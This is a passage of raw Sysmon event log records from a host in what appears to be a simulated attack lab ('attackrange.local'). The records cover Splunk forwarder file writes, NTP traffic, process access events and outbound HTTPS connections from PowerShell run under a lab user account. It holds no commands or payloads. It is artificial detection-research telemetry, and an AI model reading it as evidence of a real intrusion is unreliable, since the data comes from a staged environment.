Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=290CF7550F49EF920E5D1BEEB768250B,SHA256=087F63FD5E9728D5CF4CDC1F304D9DEF570B4833327B18E9BEF9454589F1C110,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 13241300x800000000000000035085825Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:17:06.562{B81B27B7-4012-611D-1000-00000000C801}976C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d7a5a6-0xe5952786) 23542300x800000000000000035085824Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:06.363{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE6CF99434E50F50981B6646AFFB9CD0,SHA256=D7383201E5CA635C13D3C0F51746BC981552A21EF49EF5CBE854A17104582F4F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085831Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:32.572{B81B27B7-4012-611D-1000-00000000C801}976C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.15win-host-987.attackrange.local123ntpfalse10.0.1.14WIN-DC-128123ntp 354300x800000000000000035085830Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:32.026{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56772-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035085829Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:07.630{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=22A5CFD9F77B784252E452BE41711E7E,SHA256=C0613799B4AA58DBCE04B89AB608811AC7B24678EBA142E370987FF393764CEE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085828Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:07.630{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6972D312EFCE322AB83292F669187F48,SHA256=73ECF023A1426B0426FD68D4EF61EBE8CEF4D5A067DB8A6619F7E5E1E106A997,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085827Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:07.384{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E68F92BBDB9A3222F35C2A7513787027,SHA256=740B98AD89FFED2ED425A74C369FCB6A93A544B6F92B82C649132122ECD49B16,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085826Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:07.115{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B3CA12ED5660CDD2AEF6CD7922F74903,SHA256=B9E44ACC36BA302BD8F35961BA9F0FB438796F14D0EF823D3E055ACD1660F08F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085832Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:08.398{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C316BF5E6ED8C537467CBE4E53765A7,SHA256=4B2E94FF15016C56BE0F6071D01E5CA26D59DD02DAE5E775EADEB9846A999932,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085833Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:09.412{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9CBC3775CF12DA75BADFF3012ADE5AD7,SHA256=BD18B75A33951E5715EB35B649B9E079DB02339A45F81CE62E42903CCBF1C6F8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085834Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:10.427{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ACEB7E909D5D082511AFC3EBCE3842FA,SHA256=34CC73A68A71BD6CF4EEE6C0C2A0E98E819B80CAA22D891DE911B37B4248CB76,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085836Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:36.099{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56773-false10.0.1.12-8000- 23542300x800000000000000035085835Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:11.475{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E9B215FEDF379DF61DE3E5DA3CAD224,SHA256=33330B5C80FC605BA3D2A59B89F48F87EF9E23E56C8D3FEC338B945992F96C22,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085837Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:12.509{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5964DB6F8D32A1B0F6C6EB6875250B84,SHA256=95911C9060F950DEAE35E23C23480CAC0BC453748E683EDEE6ED4150458A087D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085857Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:38.035{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56774-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 10341000x800000000000000035085856Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:13.755{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4FA9-613A-7490-03000000C801}6928C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085855Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:13.755{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085854Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:13.755{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085853Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:13.755{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085852Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:13.755{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085851Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:13.755{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-4FA9-613A-7490-03000000C801}6928C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085850Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:13.755{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4FA9-613A-7490-03000000C801}6928C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035085849Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:13.740{B81B27B7-4FA9-613A-7490-03000000C801}6928C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035085848Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:13.546{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=30470E2F6913D4D2AC9360E1D1BD72DC,SHA256=C69E12A13206F422043C79827BB53E638E8FA07445BD694256F910E7F9839667,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035085847Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:13.255{B81B27B7-4FA9-613A-7390-03000000C801}44285608C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085846Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:13.076{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4FA9-613A-7390-03000000C801}4428C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085845Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:13.072{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085844Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:13.072{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085843Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:13.072{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085842Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:13.072{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085841Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:13.072{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4FA9-613A-7390-03000000C801}4428C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085840Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:13.071{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4FA9-613A-7390-03000000C801}4428C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035085839Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:13.056{B81B27B7-4FA9-613A-7390-03000000C801}4428C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035085838Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:13.024{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=656DFD243AA9A2F052FFB204389ED263,SHA256=465C723F41EB7C908AC7374BFDFE3892C30DBDA1C6EBC939C86AB1A44B817EAC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085860Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:14.555{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C1C8FA67262A159C4FB98F25E4B25B85,SHA256=44134871DD218C1FF3384F2792479BCC44468925A886C2A6D650159AAF48EF8E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085859Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:14.092{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DB8209BB89E7076C38BC00C311F5384D,SHA256=29F9EF70E59C7A3175F04DB7084A03CBCC98D8802F18B837CF2490901CEDEF10,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085858Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:14.092{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=22A5CFD9F77B784252E452BE41711E7E,SHA256=C0613799B4AA58DBCE04B89AB608811AC7B24678EBA142E370987FF393764CEE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085861Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:15.608{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A106489E034BB427843A84D9110EE81,SHA256=5861205EE38B8C7C560271C857FAE7FF9C0922F59059E8A29355F0E179AE706D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085863Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:41.233{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program 